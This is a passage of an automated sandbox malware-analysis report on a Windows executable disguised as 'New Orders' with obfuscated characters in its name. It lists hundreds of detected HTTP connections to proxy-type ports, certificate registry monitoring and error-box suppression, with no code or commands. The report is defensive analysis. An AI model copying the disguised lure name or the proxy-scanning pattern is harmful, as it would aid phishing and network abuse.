                  Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50546 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50549 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44195 -> 50300
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50603 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50555 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9123 -> 50330
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50533 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50355
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50572 -> 8083
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50670 -> 9764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50602 -> 5430
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50674 -> 31571
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50672 -> 29197
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50604 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 5005
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50704 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50503
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50630 -> 8079
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50701 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50628 -> 1111
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 38117
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 8088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50609 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50575
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50752 -> 36779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50728 -> 13087
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50473
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50697 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50702 -> 7891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50671 -> 5000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 39323
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50467 -> 53777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 28695
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50772 -> 23685
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50683 -> 8800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50421
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50721 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50713 -> 10003
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50725 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50710 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50260
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50726 -> 18080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7302 -> 50225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50743 -> 17639
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 59243
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50738 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50700 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50830 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50723 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50775 -> 7117
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50789 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50793 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50256
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50576 -> 56225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 12446
                  Source: unknownNetwork traffic detected: HTTP traffic on port 24397 -> 50540
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 24834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50776 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50488
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9990 -> 50159
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 49874
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1111 -> 50628
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50296 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50155
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50697
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10003 -> 50713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50546
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50609
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9090 -> 50492
                  Source: unknownNetwork traffic detected: HTTP traffic on port 82 -> 50286
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7117 -> 50775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 64120
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50467 -> 53777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5529 -> 50566
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50630 -> 8079
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50533 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50576 -> 56225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50743 -> 17639
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50805 -> 8193
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50679 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50845 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 6014
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50863 -> 26693
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50871 -> 28723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50813 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50796 -> 55636
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50852 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50894 -> 10049
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50855 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50851 -> 27391
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 40975
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50926 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50869 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50922 -> 5432
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50449 -> 14282
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50900 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50975 -> 20317
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50931 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50899 -> 58851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50907 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50878 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50958 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50228 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 3129
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50873 -> 84
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 31679
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50898 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50974 -> 20001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50939 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50923 -> 8880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50969 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50957 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50972 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 6821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51028 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51036 -> 58703
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50409 -> 41746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51082 -> 61634
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50908 -> 7302
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51049 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50357 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51063 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51058 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50336 -> 83
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51097 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51024 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 63951
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51018 -> 58842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50428 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51154 -> 15410
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51147 -> 54917
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51053 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50445 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51096 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51090 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 10513
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51089 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51078 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50582 -> 19802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51084 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51099 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51189 -> 5935
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51209 -> 64081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51226 -> 5432
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 58386
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51161 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51158 -> 29985
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51217 -> 30717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51220 -> 29813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50573 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51180 -> 18936
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 55109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50635 -> 25675
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51323 -> 31147
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51255 -> 2512
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51301 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51332 -> 40179
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 29718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50625 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50631 -> 15303
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51267 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50534 -> 21802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50676 -> 26087
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51239 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50563 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51310 -> 53012
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 19925
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50641 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51358 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51210 -> 36181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 50922
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50673 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 51226
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51279 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51356 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51293 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51099
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51367 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51127 -> 12792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51340 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50711 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51421 -> 12217
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51372 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 31147 -> 51323
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51354 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51352 -> 5430
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51368 -> 18080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 8083
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50538 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 5432
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51377 -> 8193
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51369 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51084
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58703 -> 51036
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51301
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51427 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51379 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 51058
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51097
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51380 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51370 -> 5000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51374 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51371 -> 8800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50513 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51395 -> 10010
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51481 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3129 -> 50181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51487 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51422 -> 7891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50829 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51428 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51490 -> 5050
                  Source: unknownNetwork traffic detected: HTTP traffic on port 18080 -> 50584
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50975 -> 20317
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51426 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51496 -> 3051
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51498 -> 4595
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50807 -> 8282
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51457 -> 10000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51494 -> 8623
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51429 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51506 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51425 -> 8880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51423 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51452 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51424 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51147 -> 54917
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51387 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51462 -> 55555
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51565 -> 1403
                  Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 50169
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51502 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51209 -> 64081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51579 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54240 -> 49800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51547 -> 27391
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51485 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 51418
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51667 -> 8585
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51600 -> 5078
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51427
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51488 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51466 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51557 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51567 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50296 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51555 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51154 -> 15410
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51082 -> 61634
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51673 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51715 -> 9054
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51584 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51582 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51586 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51575 -> 31679
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51585 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51713 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51592 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50609
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51332 -> 40179
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51702 -> 21011
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51510 -> 38832
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51743 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 24834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51518 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51733 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51599 -> 29985
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10513 -> 51140
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51279
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10010 -> 51395
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50899 -> 58851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51078 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51255 -> 2512
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51180 -> 18936
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 51370
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51574 -> 6147
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 58740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51601 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51552 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51537 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51631 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8585 -> 51667
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51040 -> 52326
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51616 -> 5039
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51758 -> 6705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51206 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51646 -> 10007
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51660 -> 29380
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51774 -> 13175
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51849 -> 8111
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51803 -> 2411
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51833 -> 9827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51883 -> 4833
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51687 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51837 -> 999
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
